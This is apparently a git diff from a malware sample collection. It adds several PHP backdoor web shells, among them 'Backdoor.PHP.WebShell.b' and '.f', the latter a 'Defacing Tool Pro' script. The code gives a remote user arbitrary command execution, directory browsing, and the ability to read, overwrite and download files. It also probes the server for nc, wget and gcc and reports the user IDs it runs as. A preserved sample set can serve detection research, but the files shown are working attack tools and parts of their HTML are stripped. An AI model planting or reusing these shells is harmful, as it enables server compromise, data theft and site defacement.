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","download" => "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", "edit" => "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs="); + +//This function sends the appropriate headers to handle the image (This is just GIF images easily modifiable +if (isset($_GET['img'])) +{ +header("Content-type: image/gif"); +echo base64_decode($images[$_GET['img']]); +die(); +} +//Sets the directory to the directory specified +if (isset($_GET['dir'])) +{ + $current_dir = realpath($_GET['dir'])."/"; +} +else +{ + $current_dir = './'; +} + +//Run a CLI command if one has been sent +if (isset($_POST['CLICommand'])) +{ + echo "
";
+	echo "Output From Command: 
"; + echo ""; + echo "
"; + die(); +} + +//set the current_dir url +if (($current_dir == './') && (!isset($_COOKIE['dshell']))) +{ + $surl = $_SERVER['REQUEST_URI']; + setcookie('dshell',$surl,time()+99999); +} +elseif (!isset($_COOKIE['dshell'])) + die('Error Could Not load the default path'); +else + $surl = $_COOKIE['dshell']; + +function scan_dir($current_dir) +{ +$chemin=$current_dir; +if (glob("$chemin*")) +{ +$files = glob("$chemin*"); +$fileListing = ""; +foreach ($files as $filename) { + $fileListing .= "$filename-<"; + } + $listing = explode('-<',$fileListing); + return $listing; + } + else + { + die("Couldn't Read directory, Blocked!!!"); + } +} + +//The majority of this function was taken off of php.net, no use reinventing the wheel when this works very well :p +//Anyway this function gets the permssions in rwx form thats read write execute format. +function perms_check($file) +{ + $perms = fileperms($file); + +if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; +} else { + // Unknown + $info = 'u'; +} + +// Owner +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + +// Group +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + +// World +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); + + return $info; +} + + +//Function to display the files in the current_dir variable +function dir_scan($current_dir) { +$output="FilenamePermissionsActions\n +.\n +.."; +$output_left=""; +foreach(scan_dir($current_dir) as $item) +{ + if ($item == "." || $item == "..") + { + $item = str_replace($current_dir,"",$item); + $output .= "". + "".$item."". + "". + ""; + + } + else + { + if ($item == "") + { } + else + { + if (is_dir($item)) + { + $perms = perms_check($item); + $item = str_replace($current_dir,"",$item); + $output .=""."".$item."$perms  "; + } + else + { + $perms = perms_check($item); + $item = str_replace($current_dir,"",$item); + $output_left .= "". + "".$item."". + "$perms". + "
". + ""; + } + } + } +} + $output .=$output_left; + return $output; +} + +//Edit File Function, $mode can be r(read) w(write) +//Content is needed only if writing +function fedit($fileLocale,$mode,$content = "") +{ + if ($mode == "r") + { + $output = htmlspecialchars(file_get_contents($fileLocale)); + return $output; + } + elseif ($mode == "w") + { + if ($content == "") + echo("Error No Content Provided!"); + else { + $file = fopen($fileLocale,"w"); + if (fwrite($file,stripslashes($content))) + { + $value = 1; + } + else + $value = 0; + fclose($file); + return $value; + } + } +} + +//Function for showing the edit page. +function edit($file) +{ + return "
+
"; +} + +//Setup the Action +if (!isset($_GET['action'])) +{ + $action = dir_scan($current_dir); +} +elseif ($_GET['action'] == 'edit') +{ + $action = edit($_GET['file']); +} +elseif ($_GET['action'] == 'write') +{ + if (fedit($_GET['file'],'w',$_POST['content'])) + $action = "Successful"; + else + $action = "Error Writing File, Possible Permission Problem"; +} +elseif ($_GET['action'] == 'download') +{ + $filename = $_GET['file']; + $filename = trim($filename); + $file = $path.$filename; + $file_size = filesize($file); + if(strstr($HTTP_USER_AGENT, "MSIE 5.5")) { + header("Content-Type: doesn/matter"); + header("Content-Disposition: filename=$filename"); + header("Content-Transfer-Encoding: binary"); + header("Pragma: no-cache"); + header("Expires: 0"); + } + else { + Header("Content-type: file/unknown"); + Header("Content-Disposition: attachment; filename=".str_replace("../","",$filename)); + Header("Content-Description: PHP3 Generated Data"); + header("Pragma: no-cache"); + header("Expires: 0"); + } + + if (is_file("$file")) { + $fp = fopen("$file", "r"); + if (!fpassthru($fp)) + fclose($fp); + } + die(); +} + +//Actual Output +echo "\n"; +echo "
\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo $action; +echo ""; +echo "\n"; +echo "
Operating System Information: ".php_uname()."
Server Running As: ".get_current_user()."
Current Directory: ".wordwrap(realpath($current_dir),100,'
')."
 
Run Command:
\n"; +echo "\n"; + +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.b b/PHP/Backdoor.PHP.WebShell.b new file mode 100644 index 00000000..6284c1c3 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.b @@ -0,0 +1,84 @@ + +EXPLOIT.PHP.BROWSER +

EXPLOIT.PHP.BROWSER

+ "") { +chdir($dir_baru); +$dir_kerja = exec("pwd"); +} +?> +
+

Active directory : +Root/"; +if ($split_dir_kerja[0] == "") { +$dir_kerja = "/"; +} else { +for ($i = 0; $i < count($split_dir_kerja); $i++) { +$url .= "/" . $split_dir_kerja[$i]; +echo "$split_dir_kerja[$i]/"; +} +} +// See you can look at many virtual host +?> +

+

Choose your new work directory

+ + +

Perintah :

+ > +

+

Perapian stderr diperlukan? +

+

Hasil Eksekusi :

+ +
+ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.f b/PHP/Backdoor.PHP.WebShell.f new file mode 100644 index 00000000..fa0255b7 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.f @@ -0,0 +1,214 @@ + +xterm at /usr/X11R6/bin/xterm, "; +if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, "; +if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, "; +if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, "; +if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, "; +if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc "; +$safe = @ini_get($safemode); +if ($safe) $pro8="safe_mode: YES, "; else $pro7="safe_mode: NO, "; +$pro8 = "PHP ".phpversion(); +$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8; +$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid(); +$ip=@gethostbyname($_SERVER['HTTP_HOST']); + +//Turns the 'ls' command more usefull, showing it as it looks in the shell +if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd); +else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd); +else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd); +else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd); +else if($cmd=='ls') $cmd = "ls -F"; + +//If there are some '//' in the cmd, its now removed +if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir); +?> + + + + + + + + + +
[ Defacing Tool Pro v ] ?
+by r3v3ng4ns - revengans@gmail.com +
+ + + + + + + + +
:
user: uid() euid() gid()
write permission:YES"; }else{ echo " no"; } ?>
server info:
pro info: ip
original path:
current path: +
+
+ +
command
+ +
